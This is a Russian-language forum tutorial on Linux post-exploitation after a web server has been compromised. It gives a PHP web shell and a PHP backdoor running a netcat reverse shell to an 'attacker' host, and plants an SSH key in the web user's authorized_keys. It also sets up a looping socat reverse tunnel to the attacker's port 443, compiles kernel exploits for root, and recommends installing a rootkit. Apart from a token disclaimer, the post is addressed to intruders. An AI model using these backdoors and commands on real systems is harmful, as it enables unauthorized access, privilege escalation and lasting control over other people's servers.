Перейти к содержимому


Linux Post Exploitation: NetCat\SoCat, Простейшие шаги на пальцах


  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1 Гость_Exmo_*

Гость_Exmo_*
  • Gosti
  • 0

Отправлено 01 Декабрь 2017 - 12:56

Linux Post Exploitation: NetCat\SoCat, Простейшие шаги на пальцах.

Оглавление

Введение
Post Exploitation: NetCat\SoCat
Escalation Privilege: Kernel Exploits
Закрепление в системе: Install Rootkit
Заключение


Информация представлена исключительно в ознакомительных целях автор не призывает выполнять эти действия на практике. 

1bc1e4343a17.jpg

Введение

Привет дорогой читатель. В этой статье я хотел рассказать о таких вещах, как пост-эксплуатация, эскалации привилегий и закрепление в системе. Поэтому если ты еще не знаком с этими понятиями советую читать дальше. Опытные же убедятся еще раз на сколько полезны инструменты netcat\socat. Как и любая другая статья, это статья обучающего характера, мы попробуем разобраться в сути, что и с чем едят. Поехали...

Post Exploitation: NetCat\SoCat

Прежде всего давайте разберемся с определением.

И так Post-Exploitation – это последующая эксплуатация скомпрометированной (взломанной) системы целью которой является сохранения управления машиной для дальнейшего использования. Это нужно взломщику, чтобы определить, какие конфиденциальные данные хранятся на сервере, а так же для дальнейшей компрометации сети.

С этим я думаю все понятно, тогда двигаемся дальше. 

Начну я с того, что последующая эксплуатация начинает с того момента когда мы имеем веб-шелл или же когда мы имеем альтернативный доступ — т. е. сам шелл. Отличие между ними в кол-ве шагов некоторых последующих действий.

Рассмотрим первый вариант, тогда принцип со вторым вам станет ясен сам собой.

Допустим у нас есть такой веб-шелл 


<?= @'' ?> 

Что эквивалентно коду ниже

<?= @shell_exec() ?> 

Хотя может быть и другой веб-шелл, например WSO, в данном случае это не важно и не играет особую роль.

Этот веб-шелл находится у нас на каком нибудь сайте пусть даже это будет wso. Так вот в таком виде в каком из себя представляют веб-шеллы, они нам неудобны в плане юзабилити. Что это значит? Дело в том, что когда мы выполняем команды на веб-шелле, все наши введенные нами команды отправляются по HTTP-протоколу, и возвращаются в том же виде. Т.е. отправили команду, сервер обработал выполнил и начал отправлять нам ответ. Так вот это никуда не годится и первой задачей в последующей эксплуатации является исправить эту проблему. 

Т.е. наша задача заключается в том, чтобы улучшить наш доступ в плане юзабилити.
Хочется сразу видить результат выполнения команд, как в обычном никс терминале, консоле... Вввод-Вывод!!

Давайте займемся этим. И познакомимся с утилитой под названием netcat.


NetCat

NetCat - это Unix утилита, позволяющая устанавливать соединения TCP и UDP, принимать оттуда данные и передавать их. Её еще называют настоящим армейским ножом! И это так скоро вы в этом и сами убедитесь. Скачать можно тут. Версия для Windows

Перейдем к делу. Воспользуемся реверс-шеллом так, как брандмауэры чаще всего фильтруют входящий трафик, чем исходящий.

Запускаем у себя на машине неткат с такими параметрами


nc -l -p 31337

Теперь когда мы запустили у себя неткат на прослушку порта

Создим php файл с таким содержанием, это мини бэкдор

<?= @'nc attacker 31337 -e /bin/sh' ?> 

Где attacker ваш IP-адрес , заливаем файл на сайт и выполняем его. И смотрим в окно где мы запустили неткат.

Отлично мы получили оболочку 


fa65c4729dd9.png

Ну это не совсем то что мы хотели... Дело в том , что команды Ctrl-C\Z\D просто не работают тут да и команда clear не сработает тут. 

Ничего страшного в этом нет. Теперь давайте сделаем вот, что...

1) создаем ключ в putty
2) скопируем ключ на сервер
3) отключаемся (неткат)
4) выполняем редирект портов у себя
5) запускаем на сервере сокат
6) подключаемся на локалхост по тунелю


Так, как логина и пароля у нас нет, будем коннектиться к серверу с помощью залитого нами ssh-ключа используя для этого сокат.

Перейдем к делу:

Для начала нам понадобится клиент ssh мы будет использовать Putty. Cкачать его можно тут. После того, как мы его скачали и распаковали архив, запускаем puttygen для создания ключа.


90fe6c8ab639.png

Заполняем парольную фразу
Сохраняем личный ключ
И копируем публичный ключ в буфер обмена

Ну, а теперь пройдемся по списку... тот, что я озвучил выше



Создадим папку где будем хранить наш ключ

mkdir ~www-data/.ssh

и проверим создалось ли она или нет командой 

ls -la



1da778fdc433.png

Далеее 

Так как наш публиный ключ не совсем представляет из себя файл скопируем наш ключ командой echo

копируем наш ключ из буфера обмена который мы ранее скопировали.

echo "тут ключ" >> ~www-data/.ssh/authorized_keys

потом заходим снова в папку .ssh

cd .ssh

и проверяем был ли создан наш ключ

ls -la 

Отлично все сделано правильно.


1c40da087459.png

Обрываем коннект нетката Ctrl-C он нам больше не нежен, настало время познакомиться с утилитой под названием socat.


СПИСОК РАЗЛИЧНЫХ ТРЮКОВ НЕТКАТ
 
Скрытый текст
 
SoCat

Socat - это ретранслятор для двунаправленной передачи данных между двумя независимыми каналами. Каждый из этих каналов передачи данных может быть файлом, каналом, устройством (терминал, модем и т.п.), сокетом (Unix, IP4, IP6 - raw, UDP, TCP), клиентом SOCKS4, подключением через proxy-сервер, SSL и т.п. Это еще один нож, как вы поняли))

Cкачать socat под windows можно тут

Поскольку уязвимая система защищена межсетевым экраном, мы собираемся использовать обратное соединение, чтобы socat перенаправлял весь трафик с системы на локальный порт.

В этом примере мы попытаемся получить доступ к локальному SSH-серверу, доступному на порту 22, используя перенаправление системы на порту 2222. 

После того как мы залили ключ с помощью нашего пхп бекдора используя неткат реверс оболочку

Нам понадобится еще один файл такого же типа

<?= @'while true; do socat TCP4:attacker:443 TCP4:127.0.0.1:22 ; done' ?> 

attacker это ваш ip
Подготовили значит мы наш файл теперь. 
Выполняем у себя такую команду

socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr

А потом заливаем наш второй пхп файл и выполняем . После чего как мы его залили и выполнили, в нашем окне где открыт сокат мы будем наблюдать такую картину


63adb121b4d0.png

Это значит дело пошло!! 

Теперь можно законектится посредством ssh

коннектимся через putty используя наш приватный ключ


34b233d937fb.png

Вуаля и мы имеем настоящий полноценный шелл на сервере! 
Правда прова у него не те что нам нужны и это мы тоже исправим.

Некоторые полезные команды socat
 
Скрытый текст

Escalation Privilege: Kernel Exploits

14eb061e4826.png

Ну а сейчас у нас время эскалации привилегий — повышения своих прав в системе. Тут всё просто выбираем нужный нам ядерный сплоит под версию ядра

кстати посмотреть версию можно командой

uname -a

или

cat /etc/*-release

компилируем, запускаем и получаем заветный уид=0. 

gcc exploit.c -o exploit && ./exploit

Ядерные сплоиты можно взять тут exploit-db

Или тут Bugtraq Exploit.IN Так, как я все равно их выложу там. rofl.gif rofl.gif 

Способы доставки сплоита на сервер

Скрытый текст

Собственно в этой части нет ничего сложно... Помните я говорил, что последующая эксплуатация начинает с того момента когда мы имеем веб-шелл или же когда мы имеем альтернативный доступ — т. е. сам шелл. Так вот бывает так что у нас сразу есть шелл в системе и мы минуем значительную часть шагов. Ну, а когда мы получили рут прова теперь надо закрепится в системе. Это значит что мы должны установить Вирус.


Закрепление в системе: Install Rootkit

Ну а, чтобы вам было не совсем скучно в новый год. И вам не казалось, что всё там очень просто, хотя это дествительно и так. Советую вам поэкспериментировать и разобраться с этим зверьком GitHub

Считайте это домашним заданием. ph34r.gif 


Заключение

На этом этапе введение пост-эксплуатацию закончено.

Сегодня мы познакомились с инструментами netcat\socat и с последующей эксплуатацией, которая в себя включает, повышение привилегий и закрепление в системе, что само по себе не так уж и мало)) И не какие нмамы не нужны и прочие скрипты на чек открытых портов. Нахрена???! Когда есть неткат в купе с сокатом. Кстати, если ты еще не используешь неткат и сокат в своем арсенале, советую, как можно быстрее включить их в свой арсенал. Эти инструменты очень довольно таки широко используются многими взломщиками. На самом деле вся инфа есть гугле, и не какие статьи вам не помогу, если вы не будите тянутся к знаниям. В статье еще опущена обфускация php скриптов посредством base64 и тд. В реальных боевых условиях это обязательных этап. Но это тема для отдельной статьи. Я лишь хотел показать что из себя представляет пост-эксплуатация, что я и сделал.

 
Скрытый текст

copyright

Сообщение отредактировал Exmo: 01 Декабрь 2017 - 13:08





Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных